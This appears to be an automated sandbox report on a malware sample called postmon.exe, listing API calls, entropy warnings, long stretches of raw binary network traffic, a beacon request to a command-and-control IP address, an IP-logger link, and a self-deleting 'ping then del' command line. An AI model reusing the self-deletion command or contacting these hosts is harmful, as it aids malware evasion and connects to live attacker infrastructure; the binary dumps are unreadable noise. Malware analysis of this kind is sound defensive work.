GetAdaptersAddresses

 flags: 15
family: 0
111 0
section {u'size_of_data': u'0x0001fc00', u'virtual_address': u'0x00033000', u'entropy': 7.95883793239223, u'name': u'.data', u'virtual_size': u'0x00020960'} entropy 7.95883793239 description A section with a high entropy has been found
entropy 0.332896461337 description Overall entropy of this PE file is high
Data received U
Data received Q‹gÜÊÝ~\ 1B˜2Cªÿlò€’*¹DOWNGRD ¤>u]̑E%½¹z÷xc'QñÕ(ˆ3CßË/;/ ÿ
Data received 2
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received ¹p3ý’,˜3ŸåG ÈÉ´²ßç¬Ö^©tU)ª_)‘]ùvâvq9çx
Data received 
Data received `
Data received J¢ù~óø£‘Hb¾h+?‹,ÑwŸm áø[:õ†Æ·´ã´n¤éJrϤ2ŽF ˜Ì­£1ïÛ^ë,Æ¿ŽY+JÜ?Û÷ìsi¨Ù—F‰ý ^bOdÀõ´ás­ŠAÆùE˜´Ê·!)ÚW¡ohÁJelî¸ÚÌI2}ö)Ï¥ÊúÀ#”èó}äÊ홹ƒÙw ÷ÆT¡øP‰5Ø.CK¯50ѽõ>ô‘ՐZªöh1I|9¬':è.Õ¹#©ïúvjEõŒÏb 5|\‹™àþøäïÈ#ï1öëօ{¸›Õ8Ý ‹¿ƒ¤òÖ¥] 5' 5ΦC%˜·~_v3-Ñó=÷¬.k?,ÁÊñ¾~ùMÑGYónÁbÇú&é¸`Ãm},ZT¢và++±¿[UÜ(÷gލ§¨‹ëõ@8§s%jÁø0;ŸÖð§ÿ»l-ýëޞLâå<Œ×Ê÷Úèï6`l„¢å`ñ>ÓYz;pp¦#"ìDҔLç §wfEK)‘?^ÉfÓ²êóüì§K[“oÕ¼9ì a(×Ù$ÖÚ·ØÉ'¬ßh^‘_šc&h¨Ü;\·H~|®È%ÉUÃC§¨§‰Ë~ "àžº/HŁ'ÕkÍ»èÝ—TpÞfNÓ<ý1.ËT P •®<Àf4•Zö&‘üPé×dÊ@¼M'þ6WC¨ÈÄÆ*2ŒôZ0¢†ÅB{ËqMš^ (Zæp|:‹8¹/«Aр5ìXNp]ȀLZG@UY ÚY9öS'‚ñVzHÖFßcìõÄL>‡k8#©1ú¿³Ëùى°L˾·^J¼§hć-á*å~¸#G0x£\IDڝì-3dgÖD;SC@xÊüÛÁ•9HÂ<Êr¨Baz2œ¼þ• G¿ˆîQæ¼™ ¿K9i ‹Æ]LøΧúÝMª,P/àÒïâèÀµo›eÙ:§YrÂ_ú¯°b¹wŠÃA™§4­Ë¾Âb€Ô´^ëd’;jó–Ëd›]<ýü<wŠüzq飺†!Ùr,‚\mº&†Ìá0Åå!)÷=Ž¨ùQ­Ú>s„+X¨ÊRÕ¢÷Á\QŸÑú~ú>-%H ¼ ÇÏt¯LBs)rþ=8hƒO]ÁˆÚöcAö?ÔBCØâÌRpú¿¿PÝÁÒÃpJ-ÙñõtwKWŒÁÞ²Û9äfºgŒòoȕ9_v/֓¶cxè1äߒlMYÂ,1Aß1žúÙBóì2ꉿ"é˜Ãé-‘ö·óë*à— 4ÿtiJL÷ô¢s¤9ƒ¶Poî¶t›Ô§µO¼"X·p‚ê©Xûœ”Z~2u’Ôh`z‰ÿ„PÚ3ƒÇg}19¦wôFG˜ÛÉE^(Aö؏™NãG¢^—â7F…ÝbhiÈý|?›å ‚àê÷6}¿²}ÎÆ´Ntš©­›º§x%Ösä…Ûµ‚•÷}¼¨FQÖklcOË6u?8ˆ$-‘ßyò¯sd‘9” FÙ>ëÄüßwšœ¤<¹md…¹Pt"Ù^¥û«u˜M;Oº.òõAmG¡‹ãˆJ -3½M¦·)€"¼%]_„åäÐe ܛñW¢)¬KAáR›ÙW–ÂÎU€’×£•ÑR6–4ÙÿÓðù©–½g:·³´à®ª®—ëRÍ/—·Ëî=O¼Ð¢ÊwóSbßt³GëÇÕy+´®Ó.¯À‡pÓ£iת½NÆé{û̏;5•dܘ:Aþû1|ß]æOÆ'1w"Io !zºŠ²á:1^ä–ë>Ì)T¦ Æ,­‰1¡;½µÛʛÔWÀ™Áޝ<4•bÇÁ37K7§ØfƒUL„q“–KÖ b,ĭǂ·(¼á v“ÇENMŽeiMáaN"…Täáá -Ü+e¼=Ù6Ïw-ø^čCŽÄõbo§L^%ÆőàVà‰¿‡$=ÈÀvh óˆiÑ£ú òؘ3ÿ³7F ”ubhU¯Ž¶KK‚£Û­‚ó†#¨¡5iÞ¨ôwýÀ+£ 896†’ïÆÜÁh\-Ž:>ÆÒuÃõQU1)Úpoî¶Ôy…‚¤Òªo¼ŽRu§,®ŽÊÙG²n½öŽÇt'C*-´5btK‡Ö¦Àï.8ö ö¼^ ®'}žuWè¤ÓÓ£_Bè¯,ŽE”nòNDVïgB9P£mºD!¯s:¶Á1ßù™ ƒ5É û£‡Ö¾3ÜÎô§,lŒË"&OQçqJù›C¹…¦Z]ÚÏdôP[†`«)«ÑMUëê4„!€ÊÍR‘)ÄD“¯<×dèzÏhÛƒ±ÍÚ¬‰£R¥{Xœ®2ânÔ z5ÿJ î^Ñ£zpV鵬¿z™ðò¶äKEÒ7¾Sù2IƒäÉO}’BáJFu†‡®•7¶4ïªÅËòãdE1„Ïï™5ÜÌ\ñ n¸ûqʹã('å+ÝZ÷ïÓÑŽÒÝ MWùÂóÀ¸#;2Ê$ŸÆõ_ýð ë·ØE”Ã@·KñnX ^?ݛçI˜V¦ˆ±Š…YÆqY¨:ÙõýýÉãDn:ÍÇAS<¼+óiô§íîES¯“:6qQ֋8µ6ÍÊæྌ‡õs¶ÆŸMº ä´èŽ Âì~äÚ1i Ü߬f 9]pzáãïòz¢KŠ6˜T-¿šïêèF´ö‚lSÌV?ÕÂÊGgœ;¶¹¶&€d&ÒQjÀ¼…è¹û Ãý¡·Éç(8|+ÁaOͳ©†“È¢†Çóò/Û¹¨¿H ‚ü&Û§è1ÓïQæ×t챝
Data received Ú, ¾W÷¼öQ®ÓGS„‘Û¯ú€§4Ë{|„L³<±¦ê }CüE«›Ï·Ø‡(}Ä Ìï=nÉ`+Æh°#ÎJ0¾¢‰(Œ&°ž…ôº-bGX{OàÞÇ’”Àj–é³wX”Ùwm3»7v”鱨R¹ØŒÀ¥á¤‰¬8¼JøxVJȅ{;G]VKWˆZ >é7ÔÀp{º¥~ы [û+Jr9×nˆÅÙRfŠåyÊ͐>n®æ@ñ&"´<ñöÏ/`R’MV­¢‘U¼ß1 )¡’ËÙ½÷*£&½Ð±]” „{fа•DÎ_¢^‹÷Æ…a¯Á>³ðoÂíÄÙ®%?å%”w¥nns¥´4MBhŽh‚ùrӄ]ªp—˜Miß5$gCìè ël9ÉÒG߁s`ÉŽ±(¨ÌÕ)ùƒ+¼ŠÍ9l)F$p§¿4\ rV³,_ž¬_%°ÿÙΨK8¬/!åPG´;M‡ëÉ8Ï9t—¥K4€‰·„§•*ò)6ôŸTŽ–øzSD°‰Õª×>0‡-õ;uoKH)çä±ÌKÕìè'™¿füûP©:ômÂ;2²½CçÅX¶4Íâ'ޘ \òr¥ç¯Lée‘aä¹oBà{í– tíJRBœ†è™Á™N¬ 8p£Sæ)Mg„Öt"í°'…²év#ë7´Qó[ãïzÊ6Ւ*eɪ[¼9qþzœOí´€Ö‡7“©E%Óy“L"r ûËPõqR›»>Âf 9ƒ žëè•Ðö~÷Ÿ&ƒ–ƒ&Úé«N(‡‚ªCÂÆÒíÿˆ¼,ê–6Ÿ;CÏÀ>‹»·3D˜¸Ëf$’è̲Ð 7j$Oûò@Óߓ1û :# JøîŠik®M³ê`¡µÈ…òÜy†q¾GÛwj`yÚÇÉ;:LŽóà™ñ£CvRœ_ÝKÞ¶¯ VN>пš%¦úCšk"À©6gK±òú6!¬´­=§‘—Z%%YolÒ5æ* °­§".ªáçاUDU>ÈLu­æù@¡>FrfGDÓÒ…U<CÒØ6FLü&D‹² ƒRöæb/ȏÙ*n4(â¦ÊWÅâTÈd¯¡‹0ÜŒî|´¢Ž9@AŽ_bܟùe¯|ø{-ƒœliy¼JLE#ð_4qÛEŸ .ßãY7çêåç&žlúãˆu9®ÚëÃÚĬš7ÒYŒd·sqÅÖÙÄ*ïcÑݚÉþ‚/êÜä¤6}ÐG;. rµV3BvÁs/Œ‚o7×ë®ìåhÿðT7Çh-E¦LUìšÿâëúÄ øñZù±Íæù%°c’˜ˆÍÀ)ր¡R­?ãRRÂÀ9DZÐÃÅÀòømPÓDí6 XuZùˆÞ>»Ô{:×û7)rüömN¯@¦reä\Õ½ÿz™ôsTC0ßÖúÑÞV7²yð…m ÙnBXª~™}×R7™Žï¶G<OSñ« ½DjöžV@#µ’æ—臆"R†ÜðtÜrË?Âû’識­ý"ŠIò{Óá4h[½od‹Y õSc %NÁðÝ`ї ÐÊ^ú¥ÝjgU 3_œ¥DCüé#-|m1*šl,fê"‚®$„¸Ô–ôíó’''Ê®£ð‹›jSŒóÂGòstSXV¿ßǟ&œêÑB3uùÂê«Þãù7ˆU!™7Ƨ» :Þáºï!«¶ç*üq¢¾ßë5lÊjðú·^}ÌߌÞrV>\i¤²†ÃJ]?C:ߔ"ÌyaÓ mbŠõ%׌G§3Z_Ä6_¹W1a–Ô Ø]ª½/YçMÍá²cˆ4P2Sb˜¿Âïl֖àp‡5|‡*˜#3ù7œcš3ýôƨ€íÿŠE…ƒz?°ì`Ïz¸(mV„†Z~ðƒò_Z; »Ts»òÉVœ›I+.çäžÔî1·a¬ 51‡SʁA¨¹|ÚÑ­¢Ñ†ÚBpÂÜÐXpbÇèƒ<74$”—ëä…‡&ø&F”F†Ç"ËÂGä))%蜄 D[“EÙiröµ½øûιSfî_ôŸjUĽ‰)„†|Z)™’%u=zÐÂ?åß/ûL¡"iò^hMžÅz{@qðÑ>ÅÔס¨!~I˜‘Ÿ -íq ,­Bç†GÄ yb¸m®ÀÂæ‡ÏÀù[n‹ ÊÀh9¨ôÔ8àÝÂÚ¤&šÚ¯Oèå°.…u†à:óÂÄöeÈb¹å°þA®ÑܲV„癝ԥƒ§ìµ-j/û$ó_¥9g ݽóZ~ ™Õì.Bdn·®QêThd[n"?møGG+œ£ 6°;‰TÅ%ßj´ñˆ'óaÿ^ŸúKT ™×¸cú›zzäàJ݂¬-/°”®hN½[x²ºN¹2áìÖR@iûÊYa6Pq:~Ð+ÒNc¦Å¢ï·Ý^ÄD=¢Íg+*âE:“”Ù…¨´³¢ç÷ì œ\“_ÜnŒdÍj¾„¬IÿQÝòî¶óv„ñ¢'·\ .2Ûµøk™o˜¡ð̒CØÝY²€Ù²#u I€H•ç±èÌää.ùáQà@Í¿9cˆC%&°(Vd xtÔÆ\ŠC÷Þ9Y@Õî\“ä¸F× ©¦Ë3ÂO w•r®E#Û;RÌx/< ‹M†¿Ò.ˆJ<¯AHrQðа‰•à ôõÖþ4×jXJzÿÕ…w á­hÃéktH-Ë=mXŸ.¸»Z½.4À”øí <Vs|Ýú7W{•‹Ê‚èzT° ÃEç¾'ßJˆƒ7P9“'P,/Åóþ’\o”æ¦ÍÚ@-M| ·”Îþ ]ey+û91)EœÍŽ¦Þ®0tjQ†I}‹Ù· d±Öº¼Wä­SÎñfç^õ0tꂥs«»ï5óÌ= -vÑÅ"È>ôqµ:×ýo#ɽ<P*4„¸ùÀD?Xª‚uy©jýœ…Mwʪ±f>\¼@-k[° zUk<~"UXB>ћ(  ‡qVh®g‹ïŒ¬õ‰W¢í•ðŽ"ês(· ѵ`,´¦&tVI†¸±*³–žò ¬ÁÚ- 0‰[,˜o€»µH,N¶MƒºAV÷ZRÝ=_ñMÚ昢Ïø=%°ñ¬P…;¢‰U`˜\'wQÉ®@Ÿãïn—/ÓUû/˜WSÊ|«¸‡ÓXÈ£»ÿçJ…%EÿaœüŽË-…™ éçACVµ¡ô½[(È¥,:䜮ú…ôR1èDæj‡M±¢ÂŸÓ1é¹W C¨&˜£}°–fè·ê^ÑÞ\ú㆓'lB@¶<QR˜t2Ñ4TLnï`W¸*ºÍÙ%ϛØäÄ2Ît-ä‚å捫Êk˪–¨_µC{Fiöà'[£¦F!lÝTAÐî5éÔ­éppäi![RĔbºÚ5þñžùuòÓ’jmÞIÖJu¶X«è‰ì½Ó³Û\é… ÛC°CcòŸ˜{oz\¬;*NuŸ¸CõMÝm]¨—qÅh†~éÑd‚Ú î’ÿVû¬jë^H.°å÷º3™ˆ[x¨Ã·&T#‚ .w\q£nã’þ±l,ƒäÀh½Ût š¼æñ¥UÊ÷W{b#V bîæZ˜ Ì“7kb«h©vG§ÅFñ˜ØP¼UJފ—åG÷Ç
Data received ãÈÐ=/ì ¿ˆÓs/ æVjò-îž/O[.‚£F€h²u—^Ø(ÍtH¿3S€ñ…À¡ŸÿlÅʔ+—ë²<FV#Nژýðe‡Þ‚1w°_š´|ÄUí$»0`8äêhVè+óÞÁ¤DûhxDéßxÒ÷HÂ<Cp£ßrbk?†k¾3ß:!ÞÀ\l.0üç}-•N͆9J·Ô|Ô>+‰îg¸)+wôú›’ Ûu–ñoúÆýuZò4‰¦ü<Ý\L֐T‘$ŠÅ}çP¥ãIG´gêì\æ¤Ùšã‹Ä‡ý]HXR=]x7òj¤MX£Ý÷ïL¬—o±æn!o2Z„µaU>q&SBsS‘AcJk&ìD0¢*—2(¥¼\4ÜÍ)–chC.c =^Ä©Þ¯3r-bT.[ ççõró÷j Œuž–up:9TBáîþäU³‚È…<÷‹£Ø+Se°€>ó*µà›4£ØVlüà€Ë­6ÃÜ\>Yc‘ä• »ÕÝNY©Q5•V±§w.+² ïd}HϲÅNäl¯ÄÜÒùèÜÍqóøû/\Âàû ;ÇリFªð ¾*% Šb²¶L»X<S'ŸÑáwA sM&W¼J¶"¿Öy—£ô[ޙGÿ¼ÿ0OÕêªáŒìr« ²ýi™Û¾Þr {íkïRµ[ðTÁˆheÁ|¯ià!½ùN\ȑÇè¿f‘OŸRØ̺g{Þ¼å·Õ`Žû·¼õyíÖzý˜ÚɛùJF¶ i‡AF:üC°aqZ£ç÷)b¾ÊjÊüš8ÚvY¾'Þ7S÷j€ßì–cˆ–\4©®HùP"ifAÊûDè~&Rüc”H-ÍUµæì†ùM®&¯À¿¾}y´r Lœ%Ê|^˜Ö•—dæ¥yxøÐOpü`‰²Í‰ÐÝ]Šù‰¸Ñ‰šVb‰ý&ÄQÉ,ú²´þ)xã݊Lƒ&œl‡þ0Ɲjö´ôÙtý-óo·L$ôó«6&sŸÛ ҍäV£»ˆ„ › ¨¼=жóÌÀÚÖD»?yŸz,@–=äÏ3ÿÁÓ@œ×ÌL!X—úü5ÖLodgUuøp¤{ø"BlúÁ¯$ ­BD¶óî Xù;ŠşL—-õð®ñþ^½@Ö?‰êˆ+gÜåâJl&C§œ÷ß ]H¹<B Ÿ:ZÿÔÒZߤû`õó/üVÏoš9h°—Ñ.Ê2–D‰)P¨éØ¢Sr+‹ªl´¡^æT=FüáV•î·ìí'ÅóWu¿(óàz#༠ ¡è±Œ°×'Ê,µ~b{3#ŸA¨{‹AzË<¤Í!)Ç®1<o”ahjÊ)ÉÓg3bZÄ%NMð݁ƒh”hÖÁ?d«€b-wù¶¶õz¤VÈßnæà]ˆ‡Õ"½!‰o—%&²g2W ¾í¶æËÅÃù¹ôEÑèŠë\õŒ6F°éëßÓÉvðMä2×ɒ(NõS­y.ÑR"gÁ!_gI…:hý0 FHB çoi¾Å£Ü4lÔ$ ¼Â#m&}ñMO•›dQíݓÇøèlztÕ@û—Ö7) @m‡í=f¿L•x^žV‘Š<›Ð~É;ô¥Æ …‡¢ï]»^-ôˤcaª«9¥(Á…˜Ù~6ùkюy [ã÷æ‡îÐüœ«ºóÍ8—Ði-u(½RqšÄ4úçÜã6ŠÔö?NxíD€³OÛOmõÓUØ7JëœÂ'ébÖ±óރPA:=Üv°RCr20¤ŸžŠ:.†‘ˆxD2w>¯3s-è-¼z¤ÇwÄ¡Ú¬` îBñõ5™Œ*ýY·gDnôÎ]ÚÁ%£Ԏ†^ô{ܕÀ3Ro֛èkB¡Ø±7nJ/ã„B.NÛxBO…3ðÏyªŽäÁÓΖØXZ{jU¸ú½=hë>³/ßödµÝ&¤B¶çAÅÒ¤™(ќÖ¶ö=:ã:Žºei>ŠÚ‘¼SÁZ3½T’ÈÖ¥t‘$~ûÍ R(mRf7t('í­~v;\§ìfª¶½ðcØó!)Ÿò|.ÉBDO=¦ôpK®xïÙ{[il(?š©KÚþ—{sÖã‡ÊÌi†LŸ Õ6ÝÚSôFÛIã=GWYËO¾ RÏ?rf£f-jMǽßÄϺì\eË{“Û€¯#ìcúLnÆHN~É3ùá[h'f::!>Õ*x·Oʁµ4‚IÀ❠BËä7jÇð¿5N,ù©Ä+u \! K먂o,uüs©ïPÀ ú{_¥ \’|b{#³}%ï´`{]*`7¨¹/–E~ÿ̧|X*b xË)™?§yÕA·ä{@"Ó÷dÇ[Çd|ê26ýýí¼A}8͎‰Éƒ ŒÃ°1ÖÙWœ 5Ke:Ž06OWŒ„Hr»1Yç:½F P˜sÏz=ÀÏ”ØX#)ÉÎs¡,iâ¾Õ ýrv™Â­û×·”mfθ^ç'­"çû8x½m„@³›ÀóÁRRºEhóP/á…78b/Ž\FœM%j^G]¿ÄÏ ¥åá•B‰:Qý›+½,ÏY)ký—|ÞèÂXG€½*Cê~¯@wåAµ·6äóØÉo={ƒ¸^qá1õ²Á·ˆê0¨Îä3Øucf½,Ehó%iNE-ˆð;Îׁ9Aâ5D~zà€b…ÿë Ðc`ø*v穯B4ŒÝ“åvs0rn£ÙZ_D8 X\σïÑdo*€¢ð둢¤³ðìŌ3¸7Å%O•fŽ.«Ød æóÿ/¼‰³ÍÙ½Èñ0äNP^+fûàôlnaXÛÀ·a“MëØ.ñ©ì¬¼Ëõ`Ð÷k¯ÒëX<V ŸT¬çÎsÍ}¾öãF§;$ÚB6VìâòÌ»ìÎk|v8_ ðÒfP•RßÐDçêÀöÞËj®šÜÞÄI9ÆV› !R¨:“MoJÇGÈÏ1¸‡ÉÓßWNbڞ“)&áꮖ\XÈèF2°~qš ±c«!¬©°x¶+º<LX>gsÃÇË•ßu»ŠPÌèd'OÖֈNÀ6Ú9‚¾Îß|цL*‰˜3Ýôå$ÇPU¤Íî^ ÿšv—Úž°¼B5ú!5T†±F$X€^µŽÙŽâ0à×ØdÏ¥<–Œ±`ë0œ`µ}´újÂ1¢õpjÌ­ ÷Ë:ù1՜à+«çôˆ÷ƒ§X´×H˪ìÂó½Î—Ëoe™–X!-1×E†Þ7|$²Tï¿›ÆCn+mP”&xn&¹(–7c<bÒ ]‹yI·?(n^(ts(Õ«Zª%ü¯ÒnâàïÇ[ÔòOîÿtì>"þ€È@¡¡º#Á?6³¦déyžÎB2"ׯ‘¢$4(5Ø7?˜¸Ôû·ùHqS 2àFZö!ÆûÆà²Z„Î4bO–T6©ï+ÂÁ²&wW·¾H ’2ˆ—lï|ƒ=¶¥j ³¨’ítzmÔV`·èà0³µ-D}öUG£µ™ºâÎÚæä6Œv.MÓï·B,èè\zƒR×¼â7õ¥:WlÎDºòöéVÏܸӔ::¬ÍÀ# àÁs²ú›í½Sf^PôŒ†d³!:øH'lOåstáž\Ÿyú-Õ1#+ÿ!'ÌŽ½Æ\NA<¨ïÎ[7RO1ø'F‹ÑÿŠR"äŒ[éuÖ@[­ë¯ïÑæiµA{3œ€iê㩔‚lŸg½ÐÔ¼ššú@›°Ây îÓòˆ­Æsô‘òÊ ÓǞ£pæA-.$X¤ULeé0SÚLZ9D>¦ÀÓT!sómDߗºÏÓD´óºèK¤VzQA=ƒÙJù¡RÌÑY8& #ô¼Šv+
Data received mkÿ6¡Jä5·òT×èõï*¿²®jåõ0æMõó3]ClAýv tÔ°cAý~V†Å>=v—Åydt½Ls2ÀLpŸ«‹^ýlÜH.2&—4;*!¥—ØÊ㘈aô|XHú(Ý M“é¢]]†˜![M«teÉ×]~{Õþ[8TlXÓƝwi½v=ûïMÒzúÒZÞ=ÝAw‡T0Y ÷"%›–%Ûë‘ð ÿáp~[ª{ȯkÆú¯”ý¿›¯\¥‚3·< *RúðÆhŽçbläî”_ •j‚aûô^^ˆ‚v³àLÄýRËíÿ8†¥Æ½®ìMS$,*Ñ"ö­[\֝—1^‰SËÅÁÇë¿ò߸úßjaKc9IfN"£ ¦8Z*N '²›ÍžçÇËÝÔ°„DïC[ÏEÞ1^ÍQå Ø)Û4ë 6ð¡áÝôز*ÿˆní‘ðÖËiÖx§É¦(:¯%Ô³R¤ú ªæ1kÞ<?àõAÌx›`,ñ‚<Âɤ®þÚ÷ ;™ûäÜ¤µ;üö;Á£à*$Û¥Öcøj’ÂöÊcSäåf@·ÿÎ×?\[ìÉ£KN¢Ù˜€Y?qÓm¸T ‰å3HÞó-┄'ó7m™«˜¤Å+&ü±7]ÃdéA»4CkŽdsçØ»ÈjËrÛ:\×քúS ‹J(¾€Ä2Y\ÿƒ)Y/È]?8Sˆ½mK¼>ò¬<!ç <f¡˜Zšìì;ãYÑJjÖÁRFO½,B ‹z© a<*¾þ”ómA¦–××Z«p¬Üg!ìpµÍE®—³xü[IÙ!# îcüÞS°<Þ+¡Öm ma÷åŽ\æà­$ÁiQ_}ð÷ädÿí^ñj’€ßgc‚á(ڞð¾Ê¸G?sM5…Àç‰ÖBýèXD+ʊ«ÐàdÑCˎ³´äIâO<šeÆÐ#¦æKDû$›Ý»§¬Ì«èQ½ÂûR˜L?ÑÉFàFÔYB§ôðjŸáÝWÏ ˜_ÃØ)¶ø{EǺ»ÐHUºdv”žåTü÷eu.˜Áj)rE­©­¼<—ÒõÒÆó³ÚBėý¦]˜˜u#Ë@õpYú…q·'áýa8Ž“…Bv­Â¤Æfƒ tÂ'(¥‰å¾2Ÿ¨V^†%GI>b2»»Gæ¼E/‚išÿ¸×½À›œ¿ öM8՝[X9m9ä×4äíÍ5ÅÏY¼\ d„jUîä5è¤é¦VP pû¬¤ Ê~gÅ OzÿXjLÀŸ¸ÜM“rF•—[œs@âÜRďÅâ^ º_¾3ˆ ªYhG5p»Tkñe(|Ÿ7¦ vFƒ•„ÖO†2ƒÚGW›Ùµw7ByG®M[ƒ:Wéj®\ w̼M:ì^7íšÕ¸SsQp ‡Xµ£SÁ { !‹V0l{&­‘”8 Èê3ÆdðgðÃé"„kt!—èÁñÎM]A;‘¾Zgè[Œ`[ )xc¨ô6Ó«ËjŸY8TFIô3__âÂgm|Eè± +¦¦ÇJj–ñt×A§ä²äIO·ƒMª7‘ŽªõP¼P AìJ-p0AN¦‰“ÃÃ Þ ÍáƒEQBG%ÐîrU¶¨ö[ä'ë°øAӛ=;[ºh èX 2ΠÑZ·jy4 ”—V+„WÕ@.±óxø*ïXb‡[¹àƒfuÀ“%Ÿäáõ¯—oˆ4Í2:{‡%FÚ £Âʂ÷x$½ô±® ä| \Œýzh¶§¤0¡aã-¸'ŠŽVþîŠi…þ©[ »Äèy_ÃhlZyI4‚¦I0øw¥è]PíJƒ —h«~ąðWé#}'r=fÊ4³í÷È]ü£XDƒ $8†® íw4ÖbúÜSóÌ|y(.:´ˆ"ȑ}) bú×´\ð­c°X÷–‹HL_Ç5S Š®ÙÉ'ø!ý-ü³]+¯Ëu»C¶¨qjs]ù Шº [eÇû¸´mJþÑ\Hê9ZkSTG[©ü—â#¬˜ž"œhÌ7š~vÍAâŒt·ÿk"‹j‚'>¾£tAãò!dÅ©¸Ï¼FQt1G™†Ø,nÁ*/§EÊÌ!zj°Á?çmû‰Ï6‹Áœ™pܟ»Ó¹@fGjOH[|÷ìM”ôFòätƒÐn·Pk$jÖXÊßggÁL"Î?Ò+èm$jß`ßc˚¹–W×"Æoþ¨ % ¤Ò£žN¼X›¥ÿR‡„7ÈbÔÌàÁû(ìˆo2Š ûµ…¥ˆ~pTè<çuPÛ/( Í×Î+´ÎBý‡ú%´‹Y»|àޕÿÉ<ÅS©ç@v¦ŒM·Jeñ^s,×b0ډóstÉaÄúåüî⫕V6¤„ré¦Ö’VÅÔçãfJý~¨ÌyQ/uþÇ;õI†0,ì…RŽ÷¯%ãYñþaïãænò¼Õ ԀBx4FõYºYlà­ùÑÊÄ%Äà êÙÞy¤½Î°Ô´þ±¢Óð“œi\ñ 4ŒNwø8»@D´ÅʏMLaÏ\3J/{EinMŠ}!ܛÝß,i”Cžh§ÖZç¿s€“hþQœDŽ BÂ)uº Ͻï°!¨—ù^HØ.úKWrVºŠ$%+²/A˜F)M÷õõ4mÕ¡ãÎ ¿ÿ 1…ß:Y"dv¸N6fD_ۙȱ.Öpây¯gﶕÍ* ¤sÙb¿ÿkùý:^”jìj\“Wßv¢LŸÎ#JÃîY‰v0¶9ÂáíLR"¦Š;ðæ™ðd¨¥”9ÀgFEŽŸ†r²"æžg^]YïS|Üêp¬Žr Œ9h øƒ‚=<¤wù©E¿PýXÇâO"<¦-‹$úÒÏäû Ƕ¢%ØqÍ. ¾_&F?ôÞO_! ßɲåB—N¼Ð²R a7'tD$ËwÏÚ9$ý}OieóåÜkï£Ø·X. Úwª5³;h%šä¶õ4ýüÐÝ*5kú‚ø™ä뭀88m¤‚V1D­§­¦+ùÎw“&&s9:óOOµæf„A%áX¿MÕA€~XmÙçë%¨uüp†³ê.þmÌû“­ ,êî3z'šÜoX’¾tª IßVhù«-(]i˜Ó»­º~q-áw göOw ùuÈÒ¾ ¢68ÑdQÑ0e€bÞM5´Ý_mÏ(×´É þ§ë|æeK-i>ÕsŸ¡µ%¾OòMðózWàÕWÇj˜]8¼ù!4IîScÚõ[àÝN ,߄ùà—•36ì²Jºå°t¡7$]0îp”ø1º>vº~ï]L)¾û™cÙTOF€Jj+Ès<U1¿]FF'u%}ɦ@Lj}ÁHâ\eWÔ§u3Deˆ•V¦Ž€ À²ïÛ³ÿZ]nöøþ 21:ëI5ðL¨)Dh‘NG «A•ö ¤ê›[ÔAßyéŒ-æ%}/ÖޘñcÛAØ¢ù:Á€/9r÷§„B纴¶y%d4<µ¾5´â~;±§ï.Þ «¿ R‡ó(…²³KèxêŸæ>ÕħáIã fÐ6X" Ò¤À F÷<‰Œ©¥x¯'œþg* S4(šÎ÷Ý·`‰ó K 4þ9n×­âL}úæì≵ºMƒ¯oÚQ} "  ñ«ÎÜäcŸ.G—¬ƒÛCî&¶_Ó­VβuÏ)þdÿš<gՊŸîãØÄè/W3‚G¡»k¡ÏlAvƒ&ºRÉ0õÊ5*‡ŸëÄþaïgÿt ƒ²‡(6Y£—²;,;¬Í² †< ‹uù[Œ6ö9ÜÏÜ`Ú,ªY¶e¬ˆTù njjY7D€òÂó‡†+øFkõMŸÔsñwqžÒ»áåä¡&µá
Data received 0
Data received HTTP/1.1 200 OK Server: nginx Date: Thu, 22 Jun 2023 01:34:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive 59 xZPbJglJY8GXNAUHUciy|6MdhbTcM|http://195.123.226.82/index.php|https://iplogger.com/1hKWS4 0
Data sent sod“¤x½ÓYTóÉ¿’{8àá)Å4Ab0Ó ¨è ¥é/5 ÀÀÀ À 28.ÿsungeomatics.com  
Data sent A›®;g™ ÿÈÈޘº'$oÁBú𶠆~ý§çßøÞن¢‹dPœ\'ìU2i/ËÃúbÖ~ú}ö›Øoô*©<2_¶Š®ÍâtCÔë¹OÉq3ŽÍ$Û§A6}øc’Âdð‡Q3̛‹GåˆV//ÂÁ³ÍKÂAãT¹·0µÇ!"ÈXÆØr‡È•È½Ò(Ë°¨" ð¡n¶u‚ B0$ÎRŸ´,Z`iª wþÉúFAÿº­ZûûV¤?½Y¯-Çá$¥j{â+ÝH灢̲%¯j™R ló; 1ÞpâÇrytbÊ*2® ·sP²0â;½I<F”vyĵ¹’ïßÈHªÑ¥dCÊòæ~â{-Cma§Þô#0‚€Grjx
Data sent póûŽuèE͇FGkp’C*æÅì£Ù£P‘³RÖz$ ä#hNÎÊ&PÂ$¼8:ÕX «ã~¸µÛ³ j#ù­¾÷¨:ѾA“£S[V‰ž® çȏNe0ò/¼g‰¹ÒÇ<ŠÝ/ãmt“>-a
Data sent GET /index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=6MdhbTcM HTTP/1.1 Host: 195.123.226.82 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
cmdline C:\Windows\System32\cmd.exe /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\postmon.exe" >> NUL
cmdline ping 127.0.0.1
cmdline "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\postmon.exe" >> NUL
host 195.123.226.82
file C:\Users\test22\AppData\Local\Temp\postmon.exe
Time & API Arguments Status Return Repeated

send

 buffer: sod“¤x½ÓYTóÉ¿’{8àá)Å4Ab0Ó ¨è ¥é/5 ÀÀÀ À 28.ÿsungeomatics.com  
socket: 1256
sent: 120
1 120 0

send

 buffer: A›®;g™ ÿÈÈޘº'$oÁBú𶠆~ý§çßøÞن¢‹dPœ\'ìU2i/ËÃúbÖ~ú}ö›Øoô*©<2_¶Š®ÍâtCÔë¹OÉq3ŽÍ$Û§A6}øc’Âdð‡Q3̛‹GåˆV//ÂÁ³ÍKÂAãT¹·0µÇ!"ÈXÆØr‡È•È½Ò(Ë°¨" ð¡n¶u‚ B0$ÎRŸ´,Z`iª wþÉúFAÿº­ZûûV¤?½Y¯-Çá$¥j{â+ÝH灢̲%¯j™R ló; 1ÞpâÇrytbÊ*2® ·sP²0â;½I<F”vyĵ¹’ïßÈHªÑ¥dCÊòæ~â{-Cma§Þô#0‚€Grjx
socket: 1256
sent: 326
1 326 0

send

